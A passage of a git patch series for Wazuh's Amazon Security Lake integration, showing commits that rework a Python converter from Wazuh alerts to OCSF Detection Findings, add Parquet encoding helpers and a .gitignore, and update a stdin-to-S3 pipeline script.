+ .../{ => logstash}/pipe-output.conf | 0 .../{ => logstash}/wazuh-s3.conf | 1 + .../amazon-security-lake/ocsf/converter.py | 125 +++++++++--------- .../amazon-security-lake/parquet/parquet.py | 20 +++ .../amazon-security-lake/parquet/test.py | 11 ++ .../amazon-security-lake/requirements.txt | 2 + 7 files changed, 102 insertions(+), 60 deletions(-) create mode 100644 integrations/amazon-security-lake/.gitignore rename integrations/amazon-security-lake/{ => logstash}/pipe-output.conf (100%) rename integrations/amazon-security-lake/{ => logstash}/wazuh-s3.conf (97%) create mode 100644 integrations/amazon-security-lake/parquet/parquet.py create mode 100644 integrations/amazon-security-lake/parquet/test.py create mode 100644 integrations/amazon-security-lake/requirements.txt diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore new file mode 100644 index 0000000000000..56bf77e1b8d6f --- /dev/null +++ b/integrations/amazon-security-lake/.gitignore @@ -0,0 +1,3 @@ +.venv/ +wazuh-event.ocsf.json +*.parquet \ No newline at end of file diff --git a/integrations/amazon-security-lake/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipe-output.conf similarity index 100% rename from integrations/amazon-security-lake/pipe-output.conf rename to integrations/amazon-security-lake/logstash/pipe-output.conf diff --git a/integrations/amazon-security-lake/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/wazuh-s3.conf similarity index 97% rename from integrations/amazon-security-lake/wazuh-s3.conf rename to integrations/amazon-security-lake/logstash/wazuh-s3.conf index 108423afd3193..6ca2ca0d5a08f 100644 --- a/integrations/amazon-security-lake/wazuh-s3.conf +++ b/integrations/amazon-security-lake/logstash/wazuh-s3.conf @@ -15,6 +15,7 @@ input { } } }' + target => "_source" schedule => "* * * * *" } } diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index a9168aead1e1a..fba84e7304dc7 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -3,6 +3,7 @@ # event comes from Filebeat event = {} + def normalize(level: int) -> int: """ Normalizes rule level into the 0-6 range, required by OCSF. @@ -10,73 +11,77 @@ def normalize(level: int) -> int: # TODO normalization return level + +def join(iterable, separator=","): + return (separator.join(iterable)) + + def convert(event: dict) -> dict: """ Converts Wazuh events to OCSF's Detecting Finding (2004) class. """ ocsf_class_template = \ - { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], - "finding_info": { - "analytic": { - "category": event["_source"]["rule"]["groups"], # Err: rule.groups is a string array, but analytic.category is a string - "name": event["_source"]["decoder"]["name"], - "type": "Rule", # analytic.type is redundant together with type_id - "type_id": 1, - "uid": event["_source"]["rule"]["id"], - }, - "attacks": { - "tactic": event["_source"]["rule"]["mitre"]["tactic"], # Err: rule.mitre.tactic is a string array, but attacks.tactic is an object - "technique": event["_source"]["rule"]["mitre"]["technique"], # Err: rule.mitre.technique is a string array, but attacks.technique is an object - "version": "v13.1" - }, - "title": event["_source"]["rule"]["description"], - "types": [ - event["_source"]["input"]["type"] - ], - "uid": event["_source"]['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - # Skipped. - # OCSF description of this field is: The version of the product, as - # defined by the event source. For example: 2013.1.3-beta. We do not - # save such info as part of the event data. - # "version": "4.9.0", - "lang": "en", - "vendor_name": "Wazuh, Inc,." + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["_source"]["rule"]["groups"]), + "name": event["_source"]["decoder"]["name"], + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": { + "name": join(event["_source"]["rule"]["mitre"]["tactic"]), + }, + "technique": { + "name": join(event["_source"]["rule"]["mitre"]["technique"]), + "uid": join(event["_source"]["rule"]["mitre"]["id"]), + }, + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] }, - "version": "1.1.0", - }, - "raw_data": event["_source"]["full_log"], - "resources": [ - { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." + }, + "version": "1.1.0", }, - ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), - "status_id": 99, - "time": event["_source"]["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] + "raw_data": event["_source"]["full_log"], + "resources": [ + { + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, ], - "nist": event["_source"]["rule"]["nist_800_53"], # Array + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + "nist": event["_source"]["rule"]["nist_800_53"], # Array + } } - } - return ocsf_class_template \ No newline at end of file + return ocsf_class_template diff --git a/integrations/amazon-security-lake/parquet/parquet.py b/integrations/amazon-security-lake/parquet/parquet.py new file mode 100644 index 0000000000000..79a146f0993a2 --- /dev/null +++ b/integrations/amazon-security-lake/parquet/parquet.py @@ -0,0 +1,20 @@ + +import pyarrow as pa +import pyarrow.parquet as pq +import pyarrow.fs as pafs + + +class Parquet: + + @staticmethod + def encode(data: dict): + return pa.Table.from_pydict(data) + + @staticmethod + def to_s3(data: pa.Table, s3: pafs.S3FileSystem): + pass + + @staticmethod + def to_file(data: pa.Table, path: str): + # pq.write_to_dataset(table=data, root_path=path) + pq.write_table(data, path) diff --git a/integrations/amazon-security-lake/parquet/test.py b/integrations/amazon-security-lake/parquet/test.py new file mode 100644 index 0000000000000..2022111b25e33 --- /dev/null +++ b/integrations/amazon-security-lake/parquet/test.py @@ -0,0 +1,11 @@ +#!/usr/bin/python + +import pyarrow as pa +from parquet import Parquet +import json + +# converted_event = {} +with open("wazuh-event.ocsf.json", "r") as fd: + events = [json.load(fd)] + table = pa.Table.from_pylist(events) + Parquet.to_file(table, "output/wazuh-event.ocsf.parquet") diff --git a/integrations/amazon-security-lake/requirements.txt b/integrations/amazon-security-lake/requirements.txt new file mode 100644 index 0000000000000..8c7a1cbaae79b --- /dev/null +++ b/integrations/amazon-security-lake/requirements.txt @@ -0,0 +1,2 @@ +pyarrow>=10.0.1 +parquet-tools>=0.2.15 \ No newline at end of file From d82ed21eafd26f1569b93e7c779ef06b3f6e8f69 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 9 Feb 2024 17:33:43 +0100 Subject: [PATCH 14/77] Update .gitignore --- integrations/amazon-security-lake/.gitignore | 180 ++++++++++++++++++- 1 file changed, 178 insertions(+), 2 deletions(-) diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore index 56bf77e1b8d6f..0740f723d0c79 100644 --- a/integrations/amazon-security-lake/.gitignore +++ b/integrations/amazon-security-lake/.gitignore @@ -1,3 +1,179 @@ -.venv/ wazuh-event.ocsf.json -*.parquet \ No newline at end of file +*.parquet + +# Created by https://www.toptal.com/developers/gitignore/api/python +# Edit at https://www.toptal.com/developers/gitignore?templates=python + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ +cover/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +.pybuilder/ +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +# For a library or package, you might want to ignore these files since the code is +# intended to run in multiple environments; otherwise, check them in: +# .python-version + +# pipenv +# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. +# However, in case of collaboration, if having platform-specific dependencies or dependencies +# having no cross-platform support, pipenv may install dependencies that don't work, or not +# install all needed dependencies. +#Pipfile.lock + +# poetry +# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. +# This is especially recommended for binary packages to ensure reproducibility, and is more +# commonly ignored for libraries. +# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control +#poetry.lock + +# pdm +# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. +#pdm.lock +# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it +# in version control. +# https://pdm.fming.dev/#use-with-ide +.pdm.toml + +# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# pytype static type analyzer +.pytype/ + +# Cython debug symbols +cython_debug/ + +# PyCharm +# JetBrains specific template is maintained in a separate JetBrains.gitignore that can +# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore +# and can be added to the global gitignore or merged into this file. For a more nuclear +# option (not recommended) you can uncomment the following to ignore the entire idea folder. +#.idea/ + +### Python Patch ### +# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration +poetry.toml + +# ruff +.ruff_cache/ + +# LSP config files +pyrightconfig.json + +# End of https://www.toptal.com/developers/gitignore/api/python \ No newline at end of file From 17dac0ca7ddb65b46e3639aaee554e43fc5f34d2 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 8 Feb 2024 08:19:39 -0300 Subject: [PATCH 15/77] Include the contents of the alert under unmapped --- integrations/stdin_to_securitylake.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 3a6145747783a..09fba3ad554d4 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -26,6 +26,9 @@ def map_to_ocsf(alert_dictionary, mappings, ocsf_output): for field in depth_levels[1:]: current_level = current_level[field] ocsf_output[key] = current_level + ### We probably need to crop the fields we already + ### mapped to OCSF from ocsf_output + ocsf_output['unmapped'] = alert_dictionary def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: From a4f74db6b0d4442a3346c2a327c0e2aace37b8f8 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 8 Feb 2024 11:44:40 -0300 Subject: [PATCH 16/77] Add support for different OCSF schema versions --- integrations/ocsf-mapping.json | 116 ++++++++++++++++++-------- integrations/stdin_to_securitylake.py | 13 +-- 2 files changed, 87 insertions(+), 42 deletions(-) diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json index b2cf6d3b8d3f7..c1238dac285df 100644 --- a/integrations/ocsf-mapping.json +++ b/integrations/ocsf-mapping.json @@ -1,42 +1,86 @@ { - "constants": + "1.0.0": { - "activity_id" : 1, - "analytic.type" : "Rule", - "analytic.type_id" : 1, - "attacks.version" : "v13.1", - "category_name" : "Findings", - "category_uid" : 2, - "class_name" : "Security Finding", - "class_uid" : 2001, - "metadata.log_name" : "Security events", - "metadata.log_provider" : "Wazuh", - "metadata.product.lang" : "en", - "metadata.product.name" : "Wazuh", - "metadata.product.vendor_name" : "Wazuh, Inc.", - "metadata.product.version" : "4.9.0", - "state_id" : 99, - "type_uid" : 200101 + "constants": + { + "activity_id" : 1, + "analytic.type" : "Rule", + "analytic.type_id" : 1, + "attacks.version" : "v13.1", + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "status_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "analytic.category" : "rule.groups", + "analytic.name" : "decoder.name", + "analytic.uid" : "rule.id", + "attacks.tactics" : "rule.mitre.tactic", + "attacks.technique" : "rule.mitre.technique", + "count" : "rule.firedtimes", + "data_sources" : ["_index", "location", "manager.name"], + "finding.title" : "rule.description", + "finding.types" : "input.type", + "finding.uid" : "id", + "message" : "rule.description", + "nist" : "rule.nist_800_53", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } }, - "mappings": + "1.1.0": { - "analytic.category" : "rule.groups", - "analytic.name" : "decoder.name", - "analytic.uid" : "rule.id", - "attacks.tactics" : "rule.mitre.tactic", - "attacks.technique" : "rule.mitre.technique", - "count" : "rule.firedtimes", - "data_sources" : ["_index", "location", "manager.name"], - "finding.title" : "rule.description", - "finding.type" : "input.type", - "finding.uid" : "id", - "message" : "rule.description", - "nist" : "rule.nist_800_53", - "raw_data" : "full_log", - "resources.name" : "agent.name", - "resources.uid" : "agent.id", - "risk_score" : "rule.level", - "severity_id" : "rule.level", - "time" : "timestamp" + "constants": + { + "activity_id" : 1, + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "finding_info.analytic.type" : "Rule", + "finding_info.analytic.type_id" : 1, + "finding_info.attacks.version" : "v13.1", + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "status_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "count" : "rule.firedtimes", + "finding_info.analytic.category" : "rule.groups", + "finding_info.analytic.name" : "decoder.name", + "finding_info.analytic.uid" : "rule.id", + "finding_info.attacks.tactic" : "rule.mitre.tactic", + "finding_info.attacks.technique" : "rule.mitre.technique", + "finding_info.title" : "rule.description", + "finding_info.types" : "input.type", + "finding_info.uid" : "id", + "message" : "rule.description", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } } } diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 09fba3ad554d4..5efb9da83bb80 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -13,13 +13,13 @@ s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary, mappings, ocsf_output): +def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): ocsf_output = {} ### Put constants into the output alert - ocsf_output |= mappings['constants'] + ocsf_output |= mappings[ocsfschema]['constants'] - for key in mappings['mappings']: - dotted_destination_field = mappings['mappings'].get(key) + for key in mappings[ocsfschema]['mappings']: + dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) depth_levels = dotted_destination.split('.') current_level = alert_dictionary[depth_levels[0]] if len(depth_levels>1): @@ -51,7 +51,7 @@ def map_block(fileobject, length, mappings): alert = json.loads(line) ocsf_mapped_alert = {} map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): @@ -66,6 +66,7 @@ def parse_arguments(): parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') + parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') @@ -95,7 +96,7 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = map_block(stdin, args.linebuffer, mappings) + current_block = map_block(stdin, args.linebuffer, mappings,args.ocsfschema) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) From 34f295b9cbd0074f10dc93bd6878bc031e1a81e6 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 15 Feb 2024 12:19:31 -0300 Subject: [PATCH 17/77] Use custom ocsf module to map alerts --- .../stdin_to_securitylake.py | 38 ++++++++++--------- 1 file changed, 20 insertions(+), 18 deletions(-) rename integrations/{ => amazon-security-lake}/stdin_to_securitylake.py (84%) diff --git a/integrations/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py similarity index 84% rename from integrations/stdin_to_securitylake.py rename to integrations/amazon-security-lake/stdin_to_securitylake.py index 5efb9da83bb80..21374d85ee0ad 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -9,26 +9,28 @@ from datetime import datetime from pyarrow import parquet, Table, fs +import ocsf + block_ending = { "block_ending": True } s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): - ocsf_output = {} - ### Put constants into the output alert - ocsf_output |= mappings[ocsfschema]['constants'] - - for key in mappings[ocsfschema]['mappings']: - dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) - depth_levels = dotted_destination.split('.') - current_level = alert_dictionary[depth_levels[0]] - if len(depth_levels>1): - for field in depth_levels[1:]: - current_level = current_level[field] - ocsf_output[key] = current_level - ### We probably need to crop the fields we already - ### mapped to OCSF from ocsf_output - ocsf_output['unmapped'] = alert_dictionary +#def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): +# ocsf_output = {} +# ### Put constants into the output alert +# ocsf_output |= mappings[ocsfschema]['constants'] +# +# for key in mappings[ocsfschema]['mappings']: +# dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) +# depth_levels = dotted_destination.split('.') +# current_level = alert_dictionary[depth_levels[0]] +# if len(depth_levels>1): +# for field in depth_levels[1:]: +# current_level = current_level[field] +# ocsf_output[key] = current_level +# ### We probably need to crop the fields we already +# ### mapped to OCSF from ocsf_output +# ocsf_output['unmapped'] = alert_dictionary def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: @@ -49,8 +51,8 @@ def map_block(fileobject, length, mappings): output.append(block_ending) break alert = json.loads(line) - ocsf_mapped_alert = {} - map_to_ocsf(alert, mappings, ocsf_mapped_alert): + ocsf_mapped_alert = ocsf.convert(alert) + #map_to_ocsf(alert, mappings, ocsf_mapped_alert): output.append(ocsf_mapped_alert) return output From fd63e9ec79d933c848029019168e3c98d3fed7a1 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 15 Feb 2024 12:53:40 -0300 Subject: [PATCH 18/77] Modify script to use converter class --- .../amazon-security-lake/ocsf/converter.py | 40 ++++++++--------- .../stdin_to_securitylake.py | 45 +++++++++---------- 2 files changed, 42 insertions(+), 43 deletions(-) diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index fba84e7304dc7..2a14b75957c97 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -27,30 +27,30 @@ def convert(event: dict) -> dict: "category_uid": 2, "class_name": "Detection Finding", "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], + "count": event["rule"]["firedtimes"], + "message": event["rule"]["description"], "finding_info": { "analytic": { - "category": join(event["_source"]["rule"]["groups"]), - "name": event["_source"]["decoder"]["name"], + "category": join(event["rule"]["groups"]), + "name": event["decoder"]["name"], "type_id": 1, - "uid": event["_source"]["rule"]["id"], + "uid": event["rule"]["id"], }, "attacks": { "tactic": { - "name": join(event["_source"]["rule"]["mitre"]["tactic"]), + "name": join(event["rule"]["mitre"]["tactic"]), }, "technique": { - "name": join(event["_source"]["rule"]["mitre"]["technique"]), - "uid": join(event["_source"]["rule"]["mitre"]["id"]), + "name": join(event["rule"]["mitre"]["technique"]), + "uid": join(event["rule"]["mitre"]["id"]), }, "version": "v13.1" }, - "title": event["_source"]["rule"]["description"], + "title": event["rule"]["description"], "types": [ - event["_source"]["input"]["type"] + event["input"]["type"] ], - "uid": event["_source"]['id'] + "uid": event['id'] }, "metadata": { "log_name": "Security events", @@ -62,25 +62,25 @@ def convert(event: dict) -> dict: }, "version": "1.1.0", }, - "raw_data": event["_source"]["full_log"], + "raw_data": event["full_log"], "resources": [ { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] + "name": event["agent"]["name"], + "uid": event["agent"]["id"] }, ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), + "risk_score": event["rule"]["level"], + "severity_id": normalize(event["rule"]["level"]), "status_id": 99, - "time": event["_source"]["timestamp"], + "time": event["timestamp"], "type_uid": 200401, "unmapped": { "data_sources": [ event["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] + event["location"], + event["manager"]["name"] ], - "nist": event["_source"]["rule"]["nist_800_53"], # Array + "nist": event["rule"]["nist_800_53"], # Array } } diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 21374d85ee0ad..49926a8aa1d64 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -6,10 +6,10 @@ import logging import time import json -from datetime import datetime +import datetime from pyarrow import parquet, Table, fs -import ocsf +from ocsf import converter block_ending = { "block_ending": True } @@ -43,7 +43,7 @@ def encode_parquet(list,bucket_name,folder): table = Table.from_pylist(list) parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) -def map_block(fileobject, length, mappings): +def map_block(fileobject, length): output=[] for line in range(0, length): line = fileobject.readline() @@ -51,44 +51,41 @@ def map_block(fileobject, length, mappings): output.append(block_ending) break alert = json.loads(line) - ocsf_mapped_alert = ocsf.convert(alert) + ocsf_mapped_alert = converter.convert(alert) #map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): - current_time = datetime.now(tz='UTC') + current_time = datetime.datetime.now(datetime.timezone.utc) return (current_time - reference_timestamp).total_seconds() -def parse_arguments(): + +if __name__ == "__main__": + clock = datetime.datetime.now(datetime.timezone.utc) + clockstr = clock.strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') - parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval for pushing data to Security Lake') + parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') - debugging = parser.add_argument_group('debugging') - debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') - debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-o','--output', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') args = parser.parse_args() - -if __name__ == "__main__": - clock = datetime.now(tz='UTC') - clockstr = clock.strftime('%F_%H.%M.%S') - parse_arguments() - logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', filename=args.output, encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: - with open(ocsf_mapping_filename) as jsonfile: - mappings = json.loads(jsonfile.read()) + #with open(ocsf_mapping_filename) as jsonfile: + # mappings = json.loads(jsonfile.read()) - with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: + with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: output_buffer = [] - starttimestamp = datetime.now(tz='UTC') + starttimestamp = datetime.datetime.now(datetime.timezone.utc) try: while True: @@ -98,14 +95,14 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = map_block(stdin, args.linebuffer, mappings,args.ocsfschema) + current_block = map_block(stdin, args.linebuffer ) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: encode_parquet(output_buffer,args.bucketname,args.foldername) logging.debug(json.dumps(output_buffer)) - starttimestamp = datetime.now(tz='UTC') + starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] output_buffer.append(current_block) @@ -117,4 +114,6 @@ def parse_arguments(): except Exception as e: logging.error("Error running script") + logging.error(e) + raise exit(1) From d32e06d003fad02248d2538c0fbd41c116eea983 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 15:28:51 -0300 Subject: [PATCH 19/77] Code polish and fix errors --- .../amazon-security-lake/ocsf/converter.py | 152 +++++++++--------- .../stdin_to_securitylake.py | 87 +++------- 2 files changed, 102 insertions(+), 137 deletions(-) diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index 2a14b75957c97..c927afa8fe87f 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -1,87 +1,89 @@ -#!/usr/bin/python +#!/usr/bin/python3 # event comes from Filebeat -event = {} - +#event = {} +#print(event) def normalize(level: int) -> int: - """ - Normalizes rule level into the 0-6 range, required by OCSF. - """ - # TODO normalization - return level + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level def join(iterable, separator=","): - return (separator.join(iterable)) + return (separator.join(iterable)) def convert(event: dict) -> dict: - """ - Converts Wazuh events to OCSF's Detecting Finding (2004) class. - """ - ocsf_class_template = \ + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. + """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["_source"]["rule"]["groups"]), + "name": event["_source"]["decoder"]["name"], + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": { + #"name": join(event["_source"]["rule"]["mitre"]["tactic"]), + "dummy": True + }, + "technique": { + #"name": join(event["_source"]["rule"]["mitre"]["technique"]), + #"uid": join(event["_source"]["rule"]["mitre"]["id"]), + "dummy": True + }, + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." + }, + "version": "1.1.0", + }, + #"raw_data": event["_source"]["full_log"], + "resources": [ { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["rule"]["firedtimes"], - "message": event["rule"]["description"], - "finding_info": { - "analytic": { - "category": join(event["rule"]["groups"]), - "name": event["decoder"]["name"], - "type_id": 1, - "uid": event["rule"]["id"], - }, - "attacks": { - "tactic": { - "name": join(event["rule"]["mitre"]["tactic"]), - }, - "technique": { - "name": join(event["rule"]["mitre"]["technique"]), - "uid": join(event["rule"]["mitre"]["id"]), - }, - "version": "v13.1" - }, - "title": 